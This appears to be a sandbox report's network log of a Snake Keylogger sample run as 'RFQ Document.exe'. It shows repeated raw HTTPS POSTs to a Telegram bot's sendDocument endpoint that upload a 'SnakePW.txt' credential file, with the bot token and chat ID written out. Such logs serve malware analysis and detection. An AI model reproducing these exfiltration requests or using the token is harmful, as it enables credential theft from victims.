                                            Data Ascii: --------------------------8d98255e104567bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:13 UTC293INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:13 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:13 UTC293INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12772,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            184192.168.2.450005149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:13 UTC294OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e11dd96a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:13 UTC294OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 31 64 64 39 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e11dd96aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:13 UTC295INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:13 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:13 UTC295INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12773,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            185192.168.2.450006149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:13 UTC296OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e13b2bab
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:13 UTC296OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 33 62 32 62 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e13b2babContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:13 UTC296INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:13 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:13 UTC297INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12774,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            186192.168.2.450007149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:13 UTC297OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e1615165
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:13 UTC298OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 36 31 35 31 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e1615165Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:13 UTC298INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:13 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:13 UTC298INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12775,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            187192.168.2.450008149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:13 UTC299OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e17defe5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:13 UTC299OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 37 64 65 66 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e17defe5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:13 UTC300INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:13 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:13 UTC300INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12776,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            188192.168.2.450009149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:13 UTC300OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e195c4ed
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:13 UTC301OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 39 35 63 34 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e195c4edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:14 UTC301INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:14 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:14 UTC302INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12778,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            189192.168.2.450010149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:14 UTC302OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e1bbeaa3
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:14 UTC302OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 62 62 65 61 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e1bbeaa3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:14 UTC303INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:14 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:14 UTC303INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12779,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            19192.168.2.449793149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:24 UTC30OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c414b3f2
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:24 UTC30OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 31 34 62 33 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c414b3f2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:24 UTC30INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:24 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
